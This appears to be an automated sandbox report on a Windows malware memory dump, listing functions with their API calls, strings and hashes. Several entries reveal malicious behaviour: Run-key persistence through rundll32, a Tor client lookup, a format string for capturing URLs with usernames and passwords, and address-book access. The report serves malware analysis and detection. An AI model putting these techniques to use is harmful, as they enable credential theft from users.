Instruction Fuzzy Hash: 86415071E40209BFEB10FBA5CD86FAEBBBAEB05750F1044A6F519B3190D7709A50CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02B8EBD0, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 76stringfilememoryCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 02B8EBE0
CreateFileW.KERNEL32(02B90C37,80000000,00000003,02B9E0D4,00000003,00000000,00000000,?,02B90C37,00000000,00000000,02B745A1,00000000), ref: 02B8EBFD
GetLastError.KERNEL32(?,02B90C37,00000000,00000000,02B745A1,00000000), ref: 02B8EC9E

Part of subcall function 02B86AB9: lstrlen.KERNEL32(?,00000000,02B8EC1E,00000027,02B9E0D4,?,00000000,?,?,02B8EC1E,Local\,00000001,?,02B90C37,00000000,00000000), ref: 02B86AEF
Part of subcall function 02B86AB9: lstrcpy.KERNEL32(00000000,00000000), ref: 02B86B13
Part of subcall function 02B86AB9: lstrcat.KERNEL32(00000000,00000000), ref: 02B86B1B

GetFileSize.KERNEL32(02B90C37,00000000,Local\,00000001,?,02B90C37,00000000,00000000,02B745A1,00000000), ref: 02B8EC29
CreateFileMappingA.KERNEL32(02B90C37,02B9E0D4,00000002,00000000,00000000,02B90C37), ref: 02B8EC3D
lstrlen.KERNEL32(02B90C37,?,02B90C37,00000000,00000000,02B745A1,00000000), ref: 02B8EC59
lstrcpy.KERNEL32(?,02B90C37), ref: 02B8EC69
GetLastError.KERNEL32(?,02B90C37,00000000,00000000,02B745A1,00000000), ref: 02B8EC71
HeapFree.KERNEL32(00000000,02B90C37,?,02B90C37,00000000,00000000,02B745A1,00000000), ref: 02B8EC84
CloseHandle.KERNEL32(02B90C37,Local\,00000001,?,02B90C37), ref: 02B8EC96

Strings

Local\, xrefs: 02B8EC11

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: File$CreateErrorLastlstrcpylstrlen$CloseCountFreeHandleHeapMappingSizeTicklstrcat
String ID: Local\
API String ID: 194907169-422136742
Opcode ID: bb15bd5e124a20a49aa53d2340ea40bd86d0201704b932f377e4b56d7ce2a21a
Instruction ID: 5978e6220ec3a963c52f0549077bfd9dd07061e5e27fc23e25eae874d5f50cac
Opcode Fuzzy Hash: bb15bd5e124a20a49aa53d2340ea40bd86d0201704b932f377e4b56d7ce2a21a
Instruction Fuzzy Hash: 5B21F670D40208FFDB11AFA5D949A9DBFB9EB05394F108969F609E3250D7748AA0DF60

Uniqueness

Uniqueness Score: -1.00%

Function 02B943D8, Relevance: 18.2, APIs: 12, Instructions: 179synchronizationstringthreadCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 02B943FF
memcpy.NTDLL(?,?,00000010), ref: 02B94422
memset.NTDLL ref: 02B9446E
lstrcpyn.KERNEL32(?,?,00000034), ref: 02B94482
GetLastError.KERNEL32 ref: 02B944B0
GetLastError.KERNEL32 ref: 02B944F3
GetLastError.KERNEL32 ref: 02B94512
WaitForSingleObject.KERNEL32(?,000927C0), ref: 02B9454C
WaitForSingleObject.KERNEL32(?,00000000), ref: 02B9455A
GetLastError.KERNEL32 ref: 02B945CF
ReleaseMutex.KERNEL32(?), ref: 02B945E1
RtlExitUserThread.NTDLL(?), ref: 02B945F7

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: ErrorLast$ObjectSingleWait$ExitMutexReleaseThreadUserlstrcpynmemcpymemset
String ID:
API String ID: 4037736292-0
Opcode ID: ae71110eaf9bf349a37092ee4015cd4374b1cbdb1c115d01e6e3d96de408bee2
Instruction ID: 9c9cfbbd8ae2214fa02561cc190b526b660f626b2410fd429a63b518e7c29239
Opcode Fuzzy Hash: ae71110eaf9bf349a37092ee4015cd4374b1cbdb1c115d01e6e3d96de408bee2
Instruction Fuzzy Hash: 50617B71944300AFCB20AF659948A2BB7F9FF85750F008E69F5AA93280E770D515CF62

Uniqueness

Uniqueness Score: -1.00%

Function 02B75A92, Relevance: 18.1, APIs: 12, Instructions: 104synchronizationpipethreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 02B75AC4
WaitForSingleObject.KERNEL32(000003CC,00000000), ref: 02B75AE6
ConnectNamedPipe.KERNEL32(?,?), ref: 02B75B06
GetLastError.KERNEL32 ref: 02B75B10
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02B75B34
FlushFileBuffers.KERNEL32(?,?,00000001,00000000,?,?,?,00000010,00000000), ref: 02B75B77
DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 02B75B80
WaitForSingleObject.KERNEL32(00000000), ref: 02B75B89
CloseHandle.KERNEL32(?), ref: 02B75B9E
GetLastError.KERNEL32 ref: 02B75BAB
CloseHandle.KERNEL32(?), ref: 02B75BB8
RtlExitUserThread.NTDLL(000000FF), ref: 02B75BCE

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Wait$CloseErrorHandleLastNamedObjectPipeSingle$BuffersConnectCreateDisconnectEventExitFileFlushMultipleObjectsThreadUser
String ID:
API String ID: 4053378866-0
Opcode ID: bfa46cc4f19c57c7f6e05947054a5b39d75fb7823df9b02e6c6a0d29c09939f4
Instruction ID: 6e75a90aa2baddb69f99cd7bc24f2e88d32d4dc6ff6da8da3cc8cd9ebd1e12b8
Opcode Fuzzy Hash: bfa46cc4f19c57c7f6e05947054a5b39d75fb7823df9b02e6c6a0d29c09939f4
Instruction Fuzzy Hash: C131B370844305AFD7219F34CD8596FBBAAFB45394F400E29F969D21A0D770DA45CF92

Uniqueness

Uniqueness Score: -1.00%

Function 02B71C76, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 164memorythreadsleepCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 02B71CAF
memset.NTDLL ref: 02B71CC3

Part of subcall function 02B8672D: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,02B71CDF,00000000,00000000,?,?,00000000,?,?,?,02B71CDF,TorClient), ref: 02B86765
Part of subcall function 02B8672D: RtlAllocateHeap.NTDLL(00000000,02B71CDF), ref: 02B86779
Part of subcall function 02B8672D: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,02B71CDF,?,?,?,02B71CDF,TorClient,?,?), ref: 02B86793
Part of subcall function 02B8672D: RegCloseKey.KERNELBASE(?,?,?,?,02B71CDF,TorClient,?,?), ref: 02B867BD

GetCurrentThreadId.KERNEL32 ref: 02B71D52
GetCurrentThread.KERNEL32 ref: 02B71D65
RtlEnterCriticalSection.NTDLL(05AE8D20), ref: 02B71E0C
Sleep.KERNEL32(0000000A), ref: 02B71E16
RtlLeaveCriticalSection.NTDLL(05AE8D20), ref: 02B71E3C
HeapFree.KERNEL32(00000000,?), ref: 02B71E6A
HeapFree.KERNEL32(00000000,00000018), ref: 02B71E7D

Strings

TorClient, xrefs: 02B71CD5

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateCriticalCurrentFreeQuerySectionThreadValue$CloseEnterLeaveSleepmemset
String ID: TorClient
API String ID: 1146182784-3399603969
Opcode ID: 910a06c800971918477276fd484dbd225a8496b1e8ed82df2a9aa43f83f5be08
Instruction ID: 25c8897c259070de8c16803a228c447bd6d117657c9188680015566c63060c4e
Opcode Fuzzy Hash: 910a06c800971918477276fd484dbd225a8496b1e8ed82df2a9aa43f83f5be08
Instruction Fuzzy Hash: 4E5124B5914305AFD710DF28D98096BBBE9FB88384F00096EF999D3250D770D958CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 02B8F83B, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 114registrymemoryCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL ref: 02B8F853
RtlEnterCriticalSection.NTDLL(00000000), ref: 02B8F894
RegOpenKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,?), ref: 02B8F8A8
CloseHandle.KERNEL32(?,?,?,00000000), ref: 02B8F8FD
HeapFree.KERNEL32(00000000,?,?,00000000,00000000), ref: 02B8F947
RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 02B8F955
RtlLeaveCriticalSection.NTDLL(00000000), ref: 02B8F960

Part of subcall function 02B73F5D: RegCreateKeyA.ADVAPI32(80000001,00000057,02B720D2), ref: 02B73F71
Part of subcall function 02B73F5D: memcpy.NTDLL(00000000,?,02B720D2,02B720D2,-00000005,?,02B7488A,Scr,00000000,-00000005,00000001,?,?,?,02B76516,00000000), ref: 02B73F9A
Part of subcall function 02B73F5D: RegSetValueExA.ADVAPI32(?,?,00000000,00000003,00000000,02B720D2), ref: 02B73FC3
Part of subcall function 02B73F5D: RegCloseKey.ADVAPI32(02B720D2,?,02B7488A,Scr,00000000,-00000005,00000001,?,?,?,02B76516,00000000,Scr,?,?,76D7F710), ref: 02B73FEE

Strings

rundll32, xrefs: 02B8F906, 02B8F90B
Client32, xrefs: 02B8F864
Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 02B8F89E

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Close$CriticalSection$CreateEnterFreeHandleHeaderHeapImageLeaveOpenValuememcpy
String ID: Client32$Software\Microsoft\Windows\CurrentVersion\Run$rundll32
API String ID: 3181710096-668865654
Opcode ID: b6bb9317ff49b1b2b78c9b29fc033d1710799fe37d4ff3e3301fc346c6ad4398
Instruction ID: 9ad9965025c178eff98092ef1bdb6b176db05d7aee59136932748a79941b69a1
Opcode Fuzzy Hash: b6bb9317ff49b1b2b78c9b29fc033d1710799fe37d4ff3e3301fc346c6ad4398
Instruction Fuzzy Hash: 1731E572A40201FBDB217F65DD84F3E7BBAEB44B84F6408A5FA09E3450D770D951DAA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B747A0, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110memorystringCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(?,0000002C,7612D3B0,00000000,?,?,?,?,02B76516,00000000,Scr,?,?,76D7F710,00000000,00000000), ref: 02B747C5
StrChrA.SHLWAPI(00000001,0000002C,?,?,?,02B76516,00000000,Scr,?,?,76D7F710,00000000,00000000,?,?,02B958C6), ref: 02B747D8
StrTrimA.SHLWAPI(?,20000920,?,?,?,02B76516,00000000,Scr,?,?,76D7F710,00000000,00000000,?,?,02B958C6), ref: 02B747FB
StrTrimA.SHLWAPI(00000001,20000920,?,?,?,02B76516,00000000,Scr,?,?,76D7F710,00000000,00000000,?,?,02B958C6), ref: 02B7480A
lstrlen.KERNEL32(?,?,?,?,02B76516,00000000,Scr,?,?,76D7F710,00000000,00000000,?,?,02B958C6,?), ref: 02B7483F
RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 02B74852
lstrcpy.KERNEL32(00000004,?), ref: 02B74870
HeapFree.KERNEL32(00000000,00000000,Scr,00000000,-00000005,00000001,?,?,?,02B76516,00000000,Scr,?,?,76D7F710,00000000), ref: 02B74896

Strings

W, xrefs: 02B747AF
Scr, xrefs: 02B7487A, 02B748CC

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: HeapTrim$AllocateFreelstrcpylstrlen
String ID: Scr$W
API String ID: 1974185407-3281027876
Opcode ID: cfd443b27edf90d7da56a82f92ea85cd7a43d2a0bb4fb9953c7fd8a695cbf185
Instruction ID: 7e63ff2d16fc1050c697275ca355aef96ebbc265af5dd287d3ab332ae291824a
Opcode Fuzzy Hash: cfd443b27edf90d7da56a82f92ea85cd7a43d2a0bb4fb9953c7fd8a695cbf185
Instruction Fuzzy Hash: DD31EF31940289FFDB10AFA5DD45FAA7FB8EF0A790F0044A6F809E7240D770A950DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B81F6E, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 103memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 02B806E2: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 02B80714
Part of subcall function 02B806E2: HeapFree.KERNEL32(00000000,00000000,?,?,02B81F8A,?,00000022,00000000,00000000,00000000,?,?), ref: 02B80739

Part of subcall function 02B84151: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,02B81FAB,?,?,?,?,?,00000022,00000000,00000000), ref: 02B8418B
Part of subcall function 02B84151: HeapFree.KERNEL32(00000000,00000000,00000000,00000001,?,02B81FAB,?,?,?,?,?,00000022,00000000,00000000,00000000,?), ref: 02B841D7

lstrlen.KERNEL32(00000000,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 02B81FE0
lstrlen.KERNEL32(?,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 02B81FE8
lstrlen.KERNEL32(?), ref: 02B81FF2
RtlAllocateHeap.NTDLL(00000000,?), ref: 02B82007
wsprintfA.USER32 ref: 02B8203C
HeapFree.KERNEL32(00000000,00000000,0000011E,00000000,00000000,00000000), ref: 02B8205E
HeapFree.KERNEL32(00000000,?), ref: 02B82073
HeapFree.KERNEL32(00000000,?), ref: 02B82080
HeapFree.KERNEL32(00000000,00000000,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 02B8208E

Strings

URL: %suser=%spass=%s, xrefs: 02B82036

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$lstrlen$Allocate$wsprintf
String ID: URL: %suser=%spass=%s
API String ID: 168057987-1589266237
Opcode ID: ae4c5e10d37bdd6fbb326feb8681edcd45c09ef1237378cb53f02c59b095eea7
Instruction ID: 3e4799b20c01af6d0300788aecb1d0874ea6c18566178d085939daf2b231f731
Opcode Fuzzy Hash: ae4c5e10d37bdd6fbb326feb8681edcd45c09ef1237378cb53f02c59b095eea7
Instruction Fuzzy Hash: 9F31BE31A44316BFDB21BF659C41F6FBBA9EF85754F00096AF948E2191D770C824CB92

Uniqueness

Uniqueness Score: -1.00%

Function 02B89695, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72filetimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,02B82509,?,?,00000000), ref: 02B896A1
_aulldiv.NTDLL(?,00000000,54D38000,00000192), ref: 02B896B7
_snwprintf.NTDLL ref: 02B896DC
CreateFileMappingW.KERNEL32(000000FF,02B9E0D4,00000004,00000000,00001000,?,?,?,00000000,54D38000,00000192), ref: 02B896F8
GetLastError.KERNEL32(?,?,00000000,54D38000,00000192,?,?,?,?,?,?,?,?,?,02B82509,?), ref: 02B8970A
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,00000000,54D38000,00000192), ref: 02B89721
CloseHandle.KERNEL32(00000000,?,?,00000000,54D38000,00000192,?,?,?,?,?,?,?,?,?,02B82509), ref: 02B89742
GetLastError.KERNEL32(?,?,00000000,54D38000,00000192,?,?,?,?,?,?,?,?,?,02B82509,?), ref: 02B8974A

Strings

Local\, xrefs: 02B896CB

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID: Local\
API String ID: 1814172918-422136742
Opcode ID: 172ad45e84a60d37c85feffcef1cc8fb4fce9767ca0b2150af173e548b653da2
Instruction ID: 206a0d645f68342272a0466920969e6b56a59c90f3f80216581d8bfb9aab0662
Opcode Fuzzy Hash: 172ad45e84a60d37c85feffcef1cc8fb4fce9767ca0b2150af173e548b653da2
Instruction Fuzzy Hash: 6C212476A80604BBDB10EF64CC05FAD37A9EB45790F2149A2FA09E7280D770EA05CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02B78334, Relevance: 16.6, APIs: 11, Instructions: 144memoryregistryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000104,76D25520), ref: 02B7836A
RtlAllocateHeap.NTDLL(00000000,00000104), ref: 02B7837F
RegCreateKeyA.ADVAPI32(80000001,?), ref: 02B783A7
HeapFree.KERNEL32(00000000,?), ref: 02B783E8
HeapFree.KERNEL32(00000000,00000000), ref: 02B783F8
RtlAllocateHeap.NTDLL(00000000,02B8AEC6), ref: 02B7840B
RtlAllocateHeap.NTDLL(00000000,02B8AEC6), ref: 02B7841A
HeapFree.KERNEL32(00000000,00000000,?,02B8AEC6,00000000,?,?,?), ref: 02B78464
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,02B8AEC6,00000000,?,?,?), ref: 02B78488
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,02B8AEC6,00000000,?,?), ref: 02B784AD
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,02B8AEC6,00000000,?,?), ref: 02B784C2

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$Allocate$CloseCreate
String ID:
API String ID: 4126010716-0
Opcode ID: 517221c1a207cfa38b4bf1c60475c5e9d5d48e31f6e2dd05eb686e91cf4d4ed8
Instruction ID: 718df81c50366ade786a1563683595be431d9cebefcc8bc5b4363f421870da1a
Opcode Fuzzy Hash: 517221c1a207cfa38b4bf1c60475c5e9d5d48e31f6e2dd05eb686e91cf4d4ed8
Instruction Fuzzy Hash: 1351D6B1C4010EEFDF11DF95D984AEEBBB9FB08384F1484AAE515E2160D3719A60EF60

Uniqueness

Uniqueness Score: -1.00%

Function 02B927DB, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,02B90745,00000000), ref: 02B927F5
RtlAllocateHeap.NTDLL(00000000,00000024), ref: 02B9280A
memset.NTDLL ref: 02B92817
HeapFree.KERNEL32(00000000,00000000,?,02B90744,?,?,00000000,?,00000000,02B8279E,?,00000000), ref: 02B92834
memcpy.NTDLL(?,?,02B90744,?,02B90744,?,?,00000000,?,00000000,02B8279E,?,00000000), ref: 02B92855

Strings

Transfer-Encoding:, xrefs: 02B928B2
Referer: , xrefs: 02B928D3
chun, xrefs: 02B928C3
Content-Length:, xrefs: 02B92885

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Heap$Allocate$Freememcpymemset
String ID: Content-Length:$Referer: $Transfer-Encoding:$chun
API String ID: 2362494589-2246273904
Opcode ID: aaed9ac900cb6eb98b394a7b289c91366b7ca415efdc15f1952e23787727fb49
Instruction ID: 05a96eb4a0cb1e4139b4c699a2eb870485e05fc04a9bea7485500a20ec5b26f8
Opcode Fuzzy Hash: aaed9ac900cb6eb98b394a7b289c91366b7ca415efdc15f1952e23787727fb49
Instruction Fuzzy Hash: 99318F31A00701AFEB31AF66CC80B26BBE9EF14754F01497AE95AD7660D770F915CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B8FC77, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 85registrylibraryloaderCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,00000001), ref: 02B8FC92
RegCloseKey.ADVAPI32(00000001,?,00000008,?,00000001), ref: 02B8FD43

Part of subcall function 02B9247D: RtlAllocateHeap.NTDLL(00000000,00000200,02B86D11), ref: 02B92489

LoadLibraryA.KERNEL32(00000000,?,00000008,?,00000001), ref: 02B8FCE0
GetProcAddress.KERNEL32(00000000,WABOpen), ref: 02B8FCF2
GetLastError.KERNEL32(?,00000008,?,00000001), ref: 02B8FD11
FreeLibrary.KERNEL32(00000000,?,00000008,?,00000001), ref: 02B8FD23
GetLastError.KERNEL32(?,00000008,?,00000001), ref: 02B8FD2B

Strings

WABOpen, xrefs: 02B8FCEC
Software\Microsoft\WAB\DLLPath, xrefs: 02B8FC83

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: ErrorLastLibrary$AddressAllocateCloseFreeHeapLoadOpenProc
String ID: Software\Microsoft\WAB\DLLPath$WABOpen
API String ID: 1628847533-1249168598
Opcode ID: dd30e2575da917f8c19cc58785e8225fa04193ac6dff60d6442d9362a77389aa
Instruction ID: 397a44c7884159dba52d97e1d6d98df7a64ae5f1094f4bbff1c27f41ee1e15bc
Opcode Fuzzy Hash: dd30e2575da917f8c19cc58785e8225fa04193ac6dff60d6442d9362a77389aa
Instruction Fuzzy Hash: 4821B072D40119BFDB217BA5ED48CAEBBBDEB85390B5409E5FA0AA3110F7304E51CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02B77EAA, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(?,00000020), ref: 02B77EC2
StrChrA.SHLWAPI(00000001,00000020), ref: 02B77ED3

Part of subcall function 02B7686F: lstrlen.KERNEL32(?,?,00000000,00000000,?,02B85C96,00000000,Referer: ,?,00000000,00000001), ref: 02B76881
Part of subcall function 02B7686F: StrChrA.SHLWAPI(?,0000000D,?,02B85C96,00000000,Referer: ,?,00000000,00000001), ref: 02B768B9

RtlAllocateHeap.NTDLL(00000000,?,?), ref: 02B77F0C
memcpy.NTDLL(00000000,http://,00000007), ref: 02B77F32
memcpy.NTDLL(00000000,?,?,00000000,http://,00000007), ref: 02B77F41
memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007), ref: 02B77F53

Strings

Host:, xrefs: 02B77EE3
https://, xrefs: 02B77F1E
http://, xrefs: 02B77F27, 02B77F30

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID: Host:$http://$https://
API String ID: 1819133394-2811860193
Opcode ID: 0b1012eb7463fc925d56885648504ef5019997d73b7c3f89e8463c31c2ff0d25
Instruction ID: d1bdaeceb4017705b06010ec2d08be74bc88f6370fa5eada30fbca851022647a
Opcode Fuzzy Hash: 0b1012eb7463fc925d56885648504ef5019997d73b7c3f89e8463c31c2ff0d25
Instruction Fuzzy Hash: 7F219F72900204BBDB11AEA9CC84F9ABBACEF04794F1440A1F908DB251D670DE40DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B8AF8A, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 55registrymemorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(02B7AB0F,00000000,00000000,02B9E280,?,?,02B74379,02B7AB0F,00000000,02B7AB0F,02B9E260), ref: 02B8AF9D
RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 02B8AFAB
wsprintfA.USER32 ref: 02B8AFC0
RegCreateKeyA.ADVAPI32(80000001,02B9E260,00000000), ref: 02B8AFD8
lstrlen.KERNEL32(?), ref: 02B8AFE7
RegSetValueExA.ADVAPI32(00000001,00000000,00000000,00000001,?,00000001), ref: 02B8AFF5
RegCloseKey.ADVAPI32(?), ref: 02B8B000
HeapFree.KERNEL32(00000000,00000000), ref: 02B8B00F

Strings

@%s@, xrefs: 02B8AFBA

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: Heaplstrlen$AllocateCloseCreateFreeValuewsprintf
String ID: @%s@
API String ID: 1575615994-4128794767
Opcode ID: 5a26f003a9071484388d9dbc54259c7f5db97bff9f005ce1dd0ec12a6bd83a51
Instruction ID: 6069410a981331b7ba3463983a00ea6d32ecc265285a94a94682ff58d9a93ebc
Opcode Fuzzy Hash: 5a26f003a9071484388d9dbc54259c7f5db97bff9f005ce1dd0ec12a6bd83a51
Instruction Fuzzy Hash: 27019232940105BFEF116B95ED49FAA3B79FB49794F104421FA05D2150D7719D30DB60

Uniqueness

Uniqueness Score: -1.00%

Function 02B8209D, Relevance: 15.3, APIs: 10, Instructions: 274memorythreadCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 02B82114
VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 02B82133
GetLastError.KERNEL32 ref: 02B823F0
RtlEnterCriticalSection.NTDLL(?), ref: 02B82400
RtlLeaveCriticalSection.NTDLL(?), ref: 02B82411
RtlExitUserThread.NTDLL(?), ref: 02B8241F

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: AllocCriticalSectionVirtual$EnterErrorExitLastLeaveThreadUser
String ID:
API String ID: 2137648861-0
Opcode ID: e840245e6d7c3da89f89dc2bb9fe41db95d224f8f836570cc071c81da9369ef0
Instruction ID: 69dbaeff547a7a3eee9b847b82c8cf84ba40f9095079757f55aa3ce41e40cf0d
Opcode Fuzzy Hash: e840245e6d7c3da89f89dc2bb9fe41db95d224f8f836570cc071c81da9369ef0
Instruction Fuzzy Hash: A7A15DB1900649EFDB30AF25CD84BAA7BB9FF08345F1089A9F959D25A0D730D898CF51

Uniqueness

Uniqueness Score: -1.00%

Function 02B80E10, Relevance: 15.1, APIs: 10, Instructions: 94filememorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 02B78BC3: memset.NTDLL ref: 02B78BE5
Part of subcall function 02B78BC3: CloseHandle.KERNEL32(?,?,?,?,?), ref: 02B78C92

MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 02B80E57
CloseHandle.KERNEL32(?), ref: 02B80E63
PathFindFileNameW.SHLWAPI(?), ref: 02B80E73
lstrlenW.KERNEL32(00000000), ref: 02B80E7D
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 02B80E8E
wcstombs.NTDLL ref: 02B80E9F
lstrlen.KERNEL32(?), ref: 02B80EAC
UnmapViewOfFile.KERNEL32(?,?,?,?,00000001), ref: 02B80EE2
HeapFree.KERNEL32(00000000,00000000), ref: 02B80EF4
DeleteFileW.KERNEL32(?), ref: 02B80F02

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: File$CloseHandleHeapViewlstrlen$AllocateDeleteFindFreeNamePathUnmapmemsetwcstombs
String ID:
API String ID: 2256351002-0
Opcode ID: 8e7164390d956809acf41489f5aae4d123be2d6211fdecb3adc803d5c619e904
Instruction ID: 6582becac4adb73f8fd6c4573fc706db51d97f33e0926c7be236886cd2b15310
Opcode Fuzzy Hash: 8e7164390d956809acf41489f5aae4d123be2d6211fdecb3adc803d5c619e904
Instruction Fuzzy Hash: 39312972C4010AEFCF21AFA5DE889AF7B79FF05385B0048A9F505A3160D7318965DB50

Uniqueness

Uniqueness Score: -1.00%

Function 02B959F7, Relevance: 15.1, APIs: 10, Instructions: 64sleepsynchronizationCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,02B78A31,?,00000000,02B90F94,00000000,00000000), ref: 02B95A0B

Part of subcall function 02B851FB: InterlockedExchange.KERNEL32(00000002,000000FF), ref: 02B85202

WaitForSingleObject.KERNEL32(?,000000FF,0000003C,?,00000000,02B90F94,00000000,00000000), ref: 02B95A25
CloseHandle.KERNEL32(?,?,00000000,02B90F94,00000000,00000000), ref: 02B95A2E
CloseHandle.KERNEL32(?,0000003C,?,00000000,02B90F94,00000000,00000000), ref: 02B95A3C
RtlEnterCriticalSection.NTDLL(00000008), ref: 02B95A48
RtlLeaveCriticalSection.NTDLL(00000008), ref: 02B95A71
Sleep.KERNEL32(000001F4,02B90F94,00000000,00000000), ref: 02B95A80
CloseHandle.KERNEL32(?), ref: 02B95A8D
LocalFree.KERNEL32(?), ref: 02B95A9B
RtlDeleteCriticalSection.NTDLL(00000008), ref: 02B95AA5

Memory Dump Source

Source File: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false

Yara matches

Similarity

API ID: CloseCriticalHandleSection$DeleteEnterEventExchangeFreeInterlockedLeaveLocalObjectSingleSleepWait
String ID:
API String ID: 1408595562-0
Opcode ID: 759a9db1ad4d7568cb04b48211e91106ca24edb453f16d516cc84d2cd275b96d
Instruction ID: f1504c06ef99c1b747e138837b8a3caca33d1416a735f0354cdc8fc10d79bc4d
Opcode Fuzzy Hash: 759a9db1ad4d7568cb04b48211e91106ca24edb453f16d516cc84d2cd275b96d
Instruction Fuzzy Hash: 72118E31A80615AFCF31AF71D988A5A77BDFF053847800964E696C3110D735E854CF64

Uniqueness

Uniqueness Score: -1.00%

Function 02B9209D, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134memorystringCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(00000000,00000020,00000000), ref: 02B920C8
StrTrimA.SHLWAPI(00000000,0A0D0920), ref: 02B920E5
